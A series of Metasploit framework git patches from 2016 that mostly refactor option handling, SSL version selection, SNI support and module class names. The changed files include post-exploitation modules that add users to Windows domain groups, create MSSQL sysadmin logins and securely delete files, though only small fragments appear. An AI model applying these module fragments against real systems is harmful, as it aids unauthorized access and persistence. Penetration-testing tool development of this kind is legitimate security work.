class Metasploit3 < Msf::Post already_member_group = false ## Add user to the domain - if (datastore['ADDTODOMAIN'] == true) + if datastore['ADDTODOMAIN'] user_add_res = run_cmd("net user \"#{datastore['USERNAME']}\" /domain",false) if (user_add_res =~ /The command completed successfully/ and user_add_res =~ /Domain Users/) @@ -261,7 +260,7 @@ class Metasploit3 < Msf::Post end ## Add user to a domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] ## check if user is already a member of the group group_add_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) @@ -291,7 +290,7 @@ class Metasploit3 < Msf::Post end ## verify user was added to domain or domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] if already_member_group == false net_groups_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 5d14a36694..3929d76f28 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post OptString.new('DB_USERNAME', [true, 'New sysadmin login', '']), OptString.new('DB_PASSWORD', [true, 'Password for new sysadmin login', '']), OptString.new('INSTANCE', [false, 'Name of target SQL Server instance', nil]), - OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', 'false']) + OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', false]) ], self.class) end diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index b49600378b..849d94d462 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -52,8 +52,8 @@ class Metasploit3 < Msf::Post print_status("Setting rpcapd as 'auto' service") service_change_startup("rpcapd", START_TYPE_AUTO) end - if datastore['ACTIVE']==true - if datastore['RHOST']==nil + if datastore['ACTIVE'] + if datastore['RHOST'].nil? print_error("RHOST is not set ") return else @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ") p = prog << " -d -p #{datastore['PORT']} " end - if datastore['NULLAUTH']==true + if datastore['NULLAUTH'] p<< "-n" end run_rpcapd(p) diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index a2691cc1d4..86e4054f16 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post n = datastore['ITERATIONS'] file = datastore['FILE'] - if datastore['ZERO']==true + if datastore['ZERO'] type = 0 print_status("The file will be overwritten with null bytes") end From 86845222efab28f1ecbb623993b4fb4272bdeee4 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 6 Mar 2016 14:51:34 -0600 Subject: [PATCH 493/686] add meterpreter platform workaround --- modules/post/multi/manage/set_wallpaper.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index 07dd50953e..c02a0278dc 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -71,6 +71,9 @@ class Metasploit3 < Msf::Post end def os_set_wallpaper(file) + if session.type =~ /meterpreter/ && session.sys.config.sysinfo['OS'] =~ /darwin/i + platform = 'osx' + end case platform when /osx/ osx_set_wallpaper(file) From 4711191def74c72d221f0b1112b5ee8d5a3674c0 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 6 Mar 2016 15:12:25 -0600 Subject: [PATCH 494/686] remove non-specific URL --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index d6ac38f372..427053995b 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary ], 'References' => [ [ 'CVE', '2013-6117' ], - [ 'URL', 'https://talosconsulting.net' ], [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] ], 'License' => MSF_LICENSE, From cc436fe4380fa12862e9eb6dd60f58bfb3086b1a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 6 Mar 2016 17:11:51 -0600 Subject: [PATCH 495/686] update to new preferred base class for modules --- spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb | 2 +- spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb | 2 +- spec/file_fixtures/modules/payloads/payload_tidy.rb | 2 +- tools/dev/msftidy.rb | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb index 7dc728b013..22f23fd1ae 100644 --- a/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary def initialize(info = {}) super( update_info( diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb index b349619004..d6ba38e2ef 100644 --- a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb @@ -6,7 +6,7 @@ require 'msf/core' # XXX: invalid super class for an auxiliary module -class Metasploit4 < Msf::Exploit +class Metasploit < Msf::Exploit # XXX: auxiliary modules don't use Rank Rank = LowRanking def initialize(info = {}) diff --git a/spec/file_fixtures/modules/payloads/payload_tidy.rb b/spec/file_fixtures/modules/payloads/payload_tidy.rb index 6a59fc28e2..a20c8dcea8 100644 --- a/spec/file_fixtures/modules/payloads/payload_tidy.rb +++ b/spec/file_fixtures/modules/payloads/payload_tidy.rb @@ -4,7 +4,7 @@ ## -module Metasploit4 +module Metasploit def initialize(info = {}) super( merge_info( diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index caa1c17474..ec2f260b06 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -477,7 +477,7 @@ class Msftidy return if @module_type == 'payloads' # get the super class in an ugly way - unless (super_class = @source.scan(/class Metasploit\d\s+<\s+(\S+)/).flatten.first) + unless (super_class = @source.scan(/class Metasploit\d?\s+<\s+(\S+)/).flatten.first) error('Unable to determine super class') return end From 5a0bec81cbd2d7ddfa2c3e4ad2e8a9f932232c2b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 6 Mar 2016 17:19:05 -0600 Subject: [PATCH 496/686] disable warnings for now, to be reenabled when the module base class is updated --- lib/msf/core/modules/loader/base.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 539593413f..95abfe0bd3 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -147,10 +147,11 @@ class Msf::Modules::Loader::Base if namespace_module.const_defined?('Metasploit3', false) klass = namespace_module.const_get('Metasploit3', false) - load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') + # We are not quite yet ready for the warnings to bubble to the user + # load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') elsif namespace_module.const_defined?('Metasploit4', false) klass = namespace_module.const_get('Metasploit4', false) - load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') + # load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') elsif namespace_module.const_defined?('Metasploit', false) klass = namespace_module.const_get('Metasploit', false) else From 05a91f1d823d43c68c8f5d1aef32b04e8d9473bc Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 6 Mar 2016 21:12:15 -0600 Subject: [PATCH 497/686] set SNI if the SSL peer is specified as a hostname --- lib/rex/socket/ssl_tcp.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 6539330307..35e2aa59a8 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -124,6 +124,11 @@ begin # Tie the context to a socket self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx) + # If peerhost looks like a hostname, set the undocumented 'hostname' + # attribute on sslsock, which enables the Server Name Indication (SNI) + # extension + self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost) + # Force a negotiation timeout begin Timeout.timeout(params.timeout) do From eea8fa86dc0b84c12cca90c8fefb82137b5362fc Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 6 Mar 2016 22:06:27 -0600 Subject: [PATCH 498/686] unify the SSLVersion fields between modules and mixins Also actually handle the 'Auto' option that we had in the crawler and remove hardcoded defaults in modules that do not need them. --- lib/msf/core/auxiliary/crawler.rb | 2 +- lib/msf/core/exploit/http/client.rb | 2 +- lib/msf/core/exploit/tcp.rb | 2 +- lib/msf/core/exploit/tcp_server.rb | 1 - lib/msf/core/opt.rb | 8 ++++++++ lib/rex/socket/ssl_tcp.rb | 2 +- modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb | 1 - modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb | 1 - modules/auxiliary/gather/ssllabs_scan.rb | 3 +-- modules/auxiliary/scanner/http/chef_webui_login.rb | 1 - modules/auxiliary/scanner/http/f5_mgmt_scanner.rb | 1 - modules/auxiliary/scanner/http/ssl_version.rb | 3 +-- .../auxiliary/scanner/http/symantec_web_gateway_login.rb | 1 - modules/auxiliary/scanner/nessus/nessus_rest_login.rb | 1 - .../exploits/linux/http/symantec_web_gateway_restore.rb | 1 - modules/exploits/windows/misc/hp_loadrunner_magentproc.rb | 1 - modules/exploits/windows/misc/hp_magentservice.rb | 1 - modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb | 1 - 18 files changed, 14 insertions(+), 19 deletions(-) diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index e52ff259de..4fd18ca9c3 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]), + Opt::SSLVersion ], self.class ) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4bf9ca91c4..771ba0551a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]), + Opt::SSLVersion, OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']), OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']) diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index cfbdfe98a9..ec70f4ff4a 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -64,7 +64,7 @@ module Exploit::Remote::Tcp register_advanced_options( [ OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]), + Opt::SSLVersion, OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]), OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']), Opt::Proxies, diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb index a86a7a2b25..b791465dfd 100644 --- a/lib/msf/core/exploit/tcp_server.rb +++ b/lib/msf/core/exploit/tcp_server.rb @@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer [ OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]), # SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment) - # OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]), OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3df70e099a..a1a53a2c87 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -51,6 +51,13 @@ module Msf Msf::OptPort.new(__method__.to_s, [ required, desc, default ]) end + # @return [OptEnum] + def self.SSLVersion + Msf::OptEnum.new('SSLVersion', [ false, + 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto', + ['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]) + end + # These are unused but remain for historical reasons class << self alias builtin_chost CHOST @@ -69,6 +76,7 @@ module Msf Proxies = Proxies() RHOST = RHOST() RPORT = RPORT() + SSLVersion = SSLVersion() end end diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 35e2aa59a8..f37ee3f4c8 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -65,7 +65,7 @@ begin when 'SSL2', :SSLv2 version = :SSLv2 # 'TLS' will be the new name for autonegotation with newer versions of OpenSSL - when 'SSL23', :SSLv23, 'TLS' + when 'SSL23', :SSLv23, 'TLS', 'Auto' version = :SSLv23 when 'SSL3', :SSLv3 version = :SSLv3 diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index cdc449f22d..5ac2524f0a 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index e7b7b72f02..b09fd6744b 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'DefaultOptions' => { - 'SSLVersion' => 'TLS1', 'SSL' => true } )) diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index 316dd0886a..2cc51788bc 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary name = name.to_s.camelize(:lower) uri = api_path + name - cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1') + cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS') cli.connect req = cli.request_cgi({ 'uri' => uri, @@ -430,7 +430,6 @@ class Metasploit3 < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index e8abdfe8f7..c659df104c 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } ) diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 3bb9ab7c3b..24b1b40085 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index ee3e135338..038378df03 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary { 'SSL' => true, 'RPORT' => 443, - 'SSLVersion' => 'SSL3' }, 'References' => [ @@ -43,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]) + Opt::SSLVersion ] ) diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 53af795bcb..cf8b7a5a35 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) end diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 88aef9dc9b..c951a43daa 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 46fe21a41f..abdb5240fd 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -47,7 +47,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index fb664c9ae6..35bfdf1fd2 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'SSL3', 'PrependMigrate' => true }, 'Payload' => diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index 80b04a5bdc..4f8e13eb73 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote { 'EXITFUNC' => 'seh', 'SSL' => true, - 'SSLVersion' => 'SSL3' }, 'Payload' => { diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index 7d538a816f..85a5bf94bc 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Payload' => { From bb36cd016e57d4b3eb722179dab957e2c08f6a18 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 6 Mar 2016 22:15:39 -0600 Subject: [PATCH 499/686] Fix #6643, Pcap.lookupaddrs does not exist --- modules/auxiliary/spoof/arp/arp_poisoning.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index e60bac50ee..a103da49c0 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary raise RuntimeError ,'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] - @sip ||= Pcap.lookupaddrs(@interface)[0] if @netifaces + @sip ||= get_ipv4_addr(@interface)[0] if @netifaces raise "LOCALSIP is not defined and can not be guessed" unless @sip raise "LOCALSIP is not an ipv4 address" unless Rex::Socket.is_ipv4?(@sip) From 666ae14259085ff71cf1b5966d65c84cd0996c5d Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 7 Mar 2016 09:56:58 +0100 Subject: [PATCH 500/686] change Metasploit3 class names --- modules/auxiliary/admin/2wire/xslt_password_reset.rb | 2 +- .../admin/android/google_play_store_uxss_xframe_rce.rb | 2 +- modules/auxiliary/admin/atg/atg_client.rb | 2 +- modules/auxiliary/admin/backupexec/dump.rb | 2 +- modules/auxiliary/admin/backupexec/registry.rb | 2 +- modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb | 2 +- modules/auxiliary/admin/db2/db2rcmd.rb | 2 +- modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb | 2 +- modules/auxiliary/admin/edirectory/edirectory_edirutil.rb | 2 +- modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb | 2 +- modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb | 2 +- modules/auxiliary/admin/hp/hp_data_protector_cmd.rb | 2 +- modules/auxiliary/admin/hp/hp_imc_som_create_account.rb | 2 +- .../admin/http/arris_motorola_surfboard_backdoor_xss.rb | 2 +- modules/auxiliary/admin/http/axigen_file_access.rb | 2 +- modules/auxiliary/admin/http/contentkeeper_fileaccess.rb | 2 +- modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb | 2 +- .../auxiliary/admin/http/dlink_dir_645_password_extractor.rb | 2 +- .../auxiliary/admin/http/dlink_dsl320b_password_extractor.rb | 2 +- modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb | 2 +- modules/auxiliary/admin/http/iis_auth_bypass.rb | 2 +- modules/auxiliary/admin/http/intersil_pass_reset.rb | 2 +- modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb | 2 +- modules/auxiliary/admin/http/jboss_bshdeployer.rb | 2 +- modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb | 2 +- modules/auxiliary/admin/http/jboss_seam_exec.rb | 2 +- modules/auxiliary/admin/http/kaseya_master_admin.rb | 2 +- modules/auxiliary/admin/http/limesurvey_file_download.rb | 2 +- modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb | 2 +- .../auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb | 2 +- modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb | 2 +- modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb | 2 +- modules/auxiliary/admin/http/manageengine_dir_listing.rb | 2 +- modules/auxiliary/admin/http/manageengine_file_download.rb | 2 +- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb | 2 +- modules/auxiliary/admin/http/netflow_file_download.rb | 2 +- modules/auxiliary/admin/http/netgear_soap_password_extractor.rb | 2 +- modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb | 2 +- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 2 +- modules/auxiliary/admin/http/scrutinizer_add_user.rb | 2 +- modules/auxiliary/admin/http/sophos_wpa_traversal.rb | 2 +- modules/auxiliary/admin/http/sysaid_admin_acct.rb | 2 +- modules/auxiliary/admin/http/sysaid_file_download.rb | 2 +- modules/auxiliary/admin/http/sysaid_sql_creds.rb | 2 +- modules/auxiliary/admin/http/tomcat_administration.rb | 2 +- modules/auxiliary/admin/http/tomcat_utf8_traversal.rb | 2 +- modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2009_002.rb | 2 +- modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb | 2 +- modules/auxiliary/admin/http/wp_custom_contact_forms.rb | 2 +- .../auxiliary/admin/http/wp_easycart_privilege_escalation.rb | 2 +- modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb | 2 +- modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb | 2 +- modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb | 2 +- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 2 +- modules/auxiliary/admin/misc/wol.rb | 2 +- modules/auxiliary/admin/motorola/wr850g_cred.rb | 2 +- modules/auxiliary/admin/ms/ms08_059_his2006.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb | 2 +- .../auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb | 2 +- modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_exec.rb | 2 +- modules/auxiliary/admin/mssql/mssql_findandsampledata.rb | 2 +- modules/auxiliary/admin/mssql/mssql_idf.rb | 2 +- modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb | 2 +- modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_sql.rb | 2 +- modules/auxiliary/admin/mssql/mssql_sql_file.rb | 2 +- modules/auxiliary/admin/mysql/mysql_enum.rb | 2 +- modules/auxiliary/admin/mysql/mysql_sql.rb | 2 +- modules/auxiliary/admin/natpmp/natpmp_map.rb | 2 +- modules/auxiliary/admin/officescan/tmlisten_traversal.rb | 2 +- modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb | 2 +- modules/auxiliary/admin/oracle/oracle_login.rb | 2 +- modules/auxiliary/admin/oracle/oracle_sql.rb | 2 +- modules/auxiliary/admin/oracle/oraenum.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr2.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr3.rb | 2 +- modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb | 2 +- modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb | 2 +- modules/auxiliary/admin/oracle/sid_brute.rb | 2 +- modules/auxiliary/admin/oracle/tnscmd.rb | 2 +- modules/auxiliary/admin/pop2/uw_fileretrieval.rb | 2 +- modules/auxiliary/admin/postgres/postgres_readfile.rb | 2 +- modules/auxiliary/admin/postgres/postgres_sql.rb | 2 +- .../auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 2 +- .../auxiliary/admin/scada/ge_proficy_substitute_traversal.rb | 2 +- modules/auxiliary/admin/scada/modicon_command.rb | 2 +- modules/auxiliary/admin/scada/modicon_password_recovery.rb | 2 +- modules/auxiliary/admin/scada/modicon_stux_transfer.rb | 2 +- modules/auxiliary/admin/scada/multi_cip_command.rb | 2 +- modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb | 2 +- modules/auxiliary/admin/serverprotect/file.rb | 2 +- modules/auxiliary/admin/smb/check_dir_file.rb | 2 +- modules/auxiliary/admin/smb/delete_file.rb | 2 +- modules/auxiliary/admin/smb/download_file.rb | 2 +- modules/auxiliary/admin/smb/list_directory.rb | 2 +- modules/auxiliary/admin/smb/psexec_command.rb | 2 +- modules/auxiliary/admin/smb/psexec_ntdsgrab.rb | 2 